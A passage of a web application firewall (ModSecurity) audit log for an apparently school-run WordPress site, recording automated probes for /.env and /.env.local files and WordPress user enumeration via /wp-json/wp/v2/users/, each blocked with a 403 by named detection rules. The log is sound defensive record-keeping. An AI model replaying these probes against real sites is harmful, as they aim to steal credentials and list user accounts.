smkn22-jkt.sch.id X-Forwarded-For: 187.16.65.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6415bb61-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6415bb61-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748167731487572 2828 (- - -) Stopwatch2: 1748167731487572 2828; combined=1318, p1=418, p2=872, p3=0, p4=0, p5=28, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6415bb61-Z-- --19befe21-A-- [25/May/2025:18:43:29 +0700] aDMCYXawJq5017Xs8D4qdgAAAMU 103.236.140.4 45478 103.236.140.4 8181 --19befe21-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 74.48.172.186 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 74.48.172.186 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1 Accept: */* --19befe21-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --19befe21-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748173409758232 804 (- - -) Stopwatch2: 1748173409758232 804; combined=312, p1=274, p2=0, p3=0, p4=0, p5=37, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --19befe21-Z-- --70bd8d4e-A-- [25/May/2025:18:43:30 +0700] aDMCYnP6UgzLD1l8HTpDYgAAABI 103.236.140.4 45480 103.236.140.4 8181 --70bd8d4e-B-- GET /.env.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 74.48.172.186 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 74.48.172.186 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1 Accept: */* --70bd8d4e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --70bd8d4e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748173410136276 749 (- - -) Stopwatch2: 1748173410136276 749; combined=305, p1=264, p2=0, p3=0, p4=0, p5=40, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --70bd8d4e-Z-- --8928327b-A-- [25/May/2025:18:54:44 +0700] aDMFBBEdxfhJOSxH8A876QAAAEU 103.236.140.4 45966 103.236.140.4 8181 --8928327b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 42.116.10.197 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 42.116.10.197 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --8928327b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8928327b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748174084743938 2783 (- - -) Stopwatch2: 1748174084743938 2783; combined=1240, p1=434, p2=777, p3=0, p4=0, p5=29, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8928327b-Z-- --b4fa8d1f-A-- [25/May/2025:19:33:17 +0700] aDMODderygsLmB9N_YSrzQAAAIM 103.236.140.4 46226 103.236.140.4 8181 --b4fa8d1f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 204.48.23.212 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 204.48.23.212 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --b4fa8d1f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b4fa8d1f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748176397375030 915 (- - -) Stopwatch2: 1748176397375030 915; combined=387, p1=339, p2=0, p3=0, p4=0, p5=47, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b4fa8d1f-Z-- --68b5cd62-A-- [25/May/2025:20:05:30 +0700] aDMVmnawJq5017Xs8D4qrgAAANA 103.236.140.4 46500 103.236.140.4 8181 --68b5cd62-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.25.111.246 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.25.111.246 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --68b5cd62-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --68b5cd62-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748178330148477 3119 (- - -) Stopwatch2: 1748178330148477 3119; combined=1359, p1=467, p2=861, p3=0, p4=0, p5=31, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68b5cd62-Z-- --67701062-A-- [25/May/2025:20:56:34 +0700] aDMhknawJq5017Xs8D4qwwAAANY 103.236.140.4 46796 103.236.140.4 8181 --67701062-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 138.36.228.108 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 138.36.228.108 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --67701062-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --67701062-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748181394842078 3035 (- - -) Stopwatch2: 1748181394842078 3035; combined=1352, p1=483, p2=838, p3=0, p4=0, p5=31, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --67701062-Z-- --1ebb9a47-A-- [25/May/2025:21:27:44 +0700] aDMo4NerygsLmB9N_YSsCwAAAJg 103.236.140.4 47006 103.236.140.4 8181 --1ebb9a47-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 151.4.150.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 151.4.150.42 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --1ebb9a47-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1ebb9a47-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748183264131057 901 (- - -) Stopwatch2: 1748183264131057 901; combined=382, p1=337, p2=0, p3=0, p4=0, p5=45, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1ebb9a47-Z-- --8b981858-A-- [25/May/2025:21:27:45 +0700] aDMo4derygsLmB9N_YSsDAAAAIY 103.236.140.4 47010 103.236.140.4 8181 --8b981858-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 151.4.150.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 151.4.150.42 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --8b981858-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8b981858-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748183265225973 686 (- - -) Stopwatch2: 1748183265225973 686; combined=257, p1=225, p2=0, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8b981858-Z-- --50bfbe32-A-- [25/May/2025:21:29:56 +0700] aDMpZNerygsLmB9N_YSsEAAAAIw 103.236.140.4 47020 103.236.140.4 8181 --50bfbe32-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.120.135.119 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.120.135.119 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --50bfbe32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --50bfbe32-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748183396708761 3306 (- - -) Stopwatch2: 1748183396708761 3306; combined=1446, p1=505, p2=909, p3=0, p4=0, p5=32, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --50bfbe32-Z-- --d1711b5e-A-- [25/May/2025:21:33:04 +0700] aDMqIHawJq5017Xs8D4q2AAAAMo 103.236.140.4 47044 103.236.140.4 8181 --d1711b5e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 220.158.233.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 220.158.233.237 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d1711b5e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d1711b5e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748183584675514 3269 (- - -) Stopwatch2: 1748183584675514 3269; combined=1428, p1=478, p2=917, p3=0, p4=0, p5=33, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d1711b5e-Z-- --5d3cd727-A-- [25/May/2025:21:45:52 +0700] aDMtIBEdxfhJOSxH8A88XAAAAEI 103.236.140.4 47090 103.236.140.4 8181 --5d3cd727-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 168.119.116.177 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 168.119.116.177 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5d3cd727-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d3cd727-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748184352432186 3438 (- - -) Stopwatch2: 1748184352432186 3438; combined=1487, p1=498, p2=957, p3=0, p4=0, p5=32, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d3cd727-Z-- --6674736c-A-- [25/May/2025:21:51:22 +0700] aDMuanP6UgzLD1l8HTpEGAAAABU 103.236.140.4 47142 103.236.140.4 8181 --6674736c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.154.241.153 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.154.241.153 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --6674736c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6674736c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748184682798347 800 (- - -) Stopwatch2: 1748184682798347 800; combined=314, p1=274, p2=0, p3=0, p4=0, p5=40, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6674736c-Z-- --a7b19b42-A-- [25/May/2025:21:51:23 +0700] aDMua3P6UgzLD1l8HTpEGQAAABQ 103.236.140.4 47148 103.236.140.4 8181 --a7b19b42-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.154.241.153 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.154.241.153 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --a7b19b42-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a7b19b42-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748184683823803 634 (- - -) Stopwatch2: 1748184683823803 634; combined=246, p1=214, p2=0, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a7b19b42-Z-- --6191b050-A-- [25/May/2025:22:02:33 +0700] aDMxCXawJq5017Xs8D4q9wAAAMQ 103.236.140.4 47194 103.236.140.4 8181 --6191b050-B-- GET /.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 31.56.56.147 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 31.56.56.147 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --6191b050-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6191b050-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748185353882095 854 (- - -) Stopwatch2: 1748185353882095 854; combined=342, p1=301, p2=0, p3=0, p4=0, p5=41, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6191b050-Z-- --11863d38-A-- [25/May/2025:23:05:14 +0700] aDM_unP6UgzLD1l8HTpFMgAAAAk 103.236.140.4 49954 103.236.140.4 8181 --11863d38-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 8.209.207.180 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 8.209.207.180 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --11863d38-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --11863d38-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748189114560157 2730 (- - -) Stopwatch2: 1748189114560157 2730; combined=1224, p1=416, p2=779, p3=0, p4=0, p5=28, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --11863d38-Z-- --c2cb545f-A-- [25/May/2025:23:05:55 +0700] aDM_43awJq5017Xs8D4sfwAAANg 103.236.140.4 50164 103.236.140.4 8181 --c2cb545f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 110.34.1.36 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 110.34.1.36 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c2cb545f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c2cb545f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748189155266551 2485 (- - -) Stopwatch2: 1748189155266551 2485; combined=1167, p1=373, p2=769, p3=0, p4=0, p5=25, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c2cb545f-Z-- --1aa68a31-A-- [25/May/2025:23:28:02 +0700] aDNFEnP6UgzLD1l8HTpJ9gAAAAY 103.236.140.4 59178 103.236.140.4 8181 --1aa68a31-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 175.117.144.122 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 175.117.144.122 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1aa68a31-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1aa68a31-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748190482792336 2783 (- - -) Stopwatch2: 1748190482792336 2783; combined=1225, p1=412, p2=784, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1aa68a31-Z-- --5957d563-A-- [25/May/2025:23:45:24 +0700] aDNJJHP6UgzLD1l8HTpKAgAAAAo 103.236.140.4 59240 103.236.140.4 8181 --5957d563-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id 